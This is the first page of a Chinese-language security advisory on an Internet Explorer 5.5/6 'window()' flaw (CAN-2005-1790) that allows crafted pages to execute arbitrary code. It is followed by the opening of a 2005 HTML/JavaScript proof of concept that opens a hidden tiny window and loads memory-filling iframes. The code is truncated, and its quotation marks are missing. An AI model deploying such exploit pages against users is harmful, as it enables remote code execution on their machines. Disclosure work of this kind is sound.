BUGTRAQ ID: 13799
CVE ID: CAN-2005-1790
CNCVE ID:CNCVE-20051790
漏洞消息时间:2005-11-21
漏洞起因
异常条件处理失败错误
影响系统
Microsoft Internet Explorer 5.5 & 6.x
危害
远程攻击者可以利用漏洞进行缓冲区溢出攻击,以进程权限执行任意指令。
攻击所需条件
攻击者必须构建恶意页面,诱使用户使用IE处理。
漏洞信息
Microsoft Internet Explorer是一款流行的WEB浏览器。
Microsoft Internet Explorer不正确初始化'window()'函数,远程攻击者可以利用漏洞进行缓冲区溢出攻击,以进程权限执行任意指令。
当结合<BODY onload>事件的使用,IE不正确初始化'window()'函数,结果可导致IE在尝试调用ECX中的废弃的(dereferenced)32位地址时可发生异常:
CALL DWORD [ECX+8]
由于这个缺陷,ECX不注意地被命名为OBJECT的UNICODE文本字符串或者更确切的说是0x006F005B所覆盖,而OFFSET 0x006F005B指向非法或不存在内存地址,IE就会导致异常而崩溃,精心构建提交数据可能以进程权限执行任意指令。
测试方法
<!--
Computer Terrorism (UK)
============================================
Microsoft Internet Explorer JavaScript Window() - Proof Of Concept
============================================
Author:
--------
Stuart Pearson
Computer Terrorism (UK)
www.computerterrorism.com
21st November, 2005
THE FOLLOWING PROOF OF CONCEPT IS PROVIDED EXCLUSIVELY FOR EDUCATIONAL
PURPOSES ONLY, AND IS PROVIDED AS IS, WITHOUT ANY EXPRESS OR IMPLIED
WARRANTY. IN PARTICULAR, NEITHER THE AUTHOR NOR COMPUTER TERRORISM
MAKES ANY REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE FITNESS
OF THIS CODE FOR ANY PARTICULAR PURPOSE.
PERMISSION TO USE, COPY, PRINT, AND DISTRIBUTE THIS DOCUMENT FOR EDUCATIONAL
PURPOSES IS HEREBY GRANTED, PROVIDED THAT THE TEXTUAL CONTENT REMAINS INTACT
AND UNMODIFIED.
-->
<html>
<head>
<meta http-equiv=Content-Language content=en-gb>
<meta http-equiv=Content-Type content=text/html; charset=windows-1252>
<title>Computer Terrorism - Microsoft Internet Explorer Proof of Concept</title>
<script type=text/javascript>
function runpoc(iframecount)
{
document.getElementById('table1').rows[2].cells[0].innerHTML=<p align=center><B>
<font color=#339966 size=1 face=Arial> loading, please wait....
</font></p>
document.getElementById('table1').rows[4].cells[0].innerHTML=
document.getElementById('table1').rows[6].cells[0].innerHTML=
document.getElementById('table1').rows[7].cells[0].innerHTML=
document.getElementById('table1').rows[9].cells[0].innerHTML=
top.consoleRef = open('blankWindow.htm','BlankWindow',
'width=1,height=1'
+',menubar=0'
+',toolbar=1'
+',status=0'
+',scrollbars=0'
+',left=1'
+',top=1'
+',resizable=0')
top.consoleRef.blur();
top.consoleRef.document.writeln(
'<html>'
+'<head>'
+'<title>CT</title>'
+'</head>'
+'<body onBlur=self.blur()>'
+'</body></html>'
)
self.focus() // Ensure the javascript prompt boxes are hidden in the background
for (i=1 ; i <=iframecount ; i++)
{
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0
src=fillmem.htm></iframe>')
}
if( iframecount == 8 ){
//alert(Ǝ');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0
共2共 1 2 下一页
